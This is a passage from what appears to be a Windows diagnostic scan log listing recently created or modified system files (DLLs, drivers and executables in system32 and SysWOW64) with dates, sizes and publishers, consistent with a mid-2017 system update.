2017-06-29 09:02 - 2017-06-29 09:02 - 00009728 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00005632 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00005632 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-user32-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00002560 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-normaliz-l1-1-0.dll
2017-06-29 09:02 - 2017-06-29 09:02 - 00002560 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2017-06-29 09:00 - 2017-06-29 09:00 - 01887232 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll
2017-06-29 09:00 - 2017-06-29 09:00 - 01505280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll
2017-06-29 08:56 - 2012-03-01 01:46 - 00023408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fs_rec.sys
2017-06-29 08:56 - 2012-03-01 01:28 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\wmi.dll
2017-06-29 08:56 - 2012-03-01 00:29 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmi.dll
2017-06-29 08:44 - 2014-06-30 17:24 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2017-06-29 08:44 - 2014-06-30 17:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll
2017-06-29 08:44 - 2014-06-06 01:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2017-06-29 08:44 - 2014-06-06 01:12 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2017-06-29 08:44 - 2014-03-09 16:48 - 01389208 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2017-06-29 08:44 - 2014-03-09 16:48 - 00171160 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2017-06-29 08:44 - 2014-03-09 16:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe
2017-06-29 08:44 - 2014-03-09 16:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll
2017-06-29 08:42 - 2017-06-02 03:10 - 00733696 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-06-29 08:42 - 2017-05-20 23:28 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-06-29 08:42 - 2017-05-20 23:28 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-06-29 08:42 - 2017-05-20 23:24 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-06-29 08:42 - 2017-05-20 23:24 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-06-29 08:42 - 2017-05-20 23:06 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-06-29 08:42 - 2017-05-20 22:55 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-06-29 08:42 - 2017-05-20 22:48 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-06-29 08:42 - 2017-05-20 22:48 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-06-29 08:42 - 2017-05-20 22:48 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-06-29 08:42 - 2017-05-20 22:47 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-06-29 08:42 - 2017-05-20 22:46 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-06-29 08:42 - 2017-05-20 22:42 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-06-29 08:42 - 2017-05-12 13:27 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-06-29 08:42 - 2017-05-12 13:26 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-06-29 08:42 - 2017-05-12 13:26 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-06-29 08:42 - 2017-05-12 13:26 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2017-06-29 08:42 - 2017-05-12 13:24 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:22 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:07 - 04001000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-06-29 08:42 - 2017-05-12 13:07 - 03945704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-06-29 08:42 - 2017-05-12 13:07 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2017-06-29 08:42 - 2017-05-12 13:04 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00629760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00313344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 13:03 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 12:55 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-06-29 08:42 - 2017-05-12 12:54 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-06-29 08:42 - 2017-05-12 12:54 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-06-29 08:42 - 2017-05-12 12:52 - 03222528 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-06-29 08:42 - 2017-05-12 12:51 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-06-29 08:42 - 2017-05-12 12:46 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-06-29 08:42 - 2017-05-12 12:43 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2017-06-29 08:42 - 2017-05-12 12:41 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-06-29 08:42 - 2017-05-12 12:41 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-06-29 08:42 - 2017-05-12 12:41 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-06-29 08:42 - 2017-05-12 12:41 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-06-29 08:42 - 2017-05-12 12:40 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 12:40 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 12:40 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-06-29 08:42 - 2017-05-12 12:40 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-06-29 08:42 - 2017-05-10 10:29 - 14183936 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2017-06-29 08:42 - 2017-05-10 10:29 - 03165184 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2017-06-29 08:42 - 2017-05-10 10:29 - 01867776 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2017-06-29 08:42 - 2017-05-10 10:29 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2017-06-29 08:42 - 2017-05-10 10:29 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2017-06-29 08:42 - 2017-05-10 10:28 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2017-06-29 08:42 - 2017-05-10 10:14 - 02651136 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2017-06-29 08:42 - 2017-05-10 10:13 - 00709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2017-06-29 08:42 - 2017-05-10 10:13 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2017-06-29 08:42 - 2017-05-10 10:13 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2017-06-29 08:42 - 2017-05-10 10:13 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2017-06-29 08:42 - 2017-05-10 10:13 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2017-06-29 08:42 - 2017-05-10 10:13 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2017-06-29 08:42 - 2017-05-10 10:12 - 12880896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2017-06-29 08:42 - 2017-05-10 10:12 - 01499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2017-06-29 08:42 - 2017-05-10 10:12 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2017-06-29 08:42 - 2017-05-10 10:00 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2017-06-29 08:42 - 2017-05-10 10:00 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2017-06-29 08:42 - 2017-05-10 10:00 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2017-06-29 08:42 - 2017-05-10 10:00 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2017-06-29 08:42 - 2017-05-10 09:52 - 00117248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2017-06-29 08:42 - 2017-05-09 10:30 - 00757248 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2017-06-29 08:42 - 2017-05-09 10:29 - 00970240 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2017-06-29 08:42 - 2017-05-09 10:11 - 00497664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2017-06-29 08:42 - 2017-05-07 10:33 - 00094440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2017-06-29 08:42 - 2017-05-07 10:29 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2017-06-29 08:42 - 2017-04-27 17:50 - 03550208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_47.dll
2017-06-29 08:42 - 2017-04-21 10:34 - 01133568 _____ (Microsoft Corporation) C:\Windows\system32\cdosys.dll
2017-06-29 08:42 - 2017-04-21 10:15 - 00805376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdosys.dll
2017-06-29 08:42 - 2017-04-17 10:37 - 02065408 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-06-29 08:42 - 2017-04-17 10:37 - 00876544 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2017-06-29 08:42 - 2017-04-17 10:37 - 00512000 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2017-06-29 08:42 - 2017-04-17 10:37 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\oleres.dll
2017-06-29 08:42 - 2017-04-17 10:37 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\comcat.dll
2017-06-29 08:42 - 2017-04-17 10:12 - 01417728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2017-06-29 08:42 - 2017-04-17 10:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2017-06-29 08:42 - 2017-04-17 10:12 - 00026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleres.dll
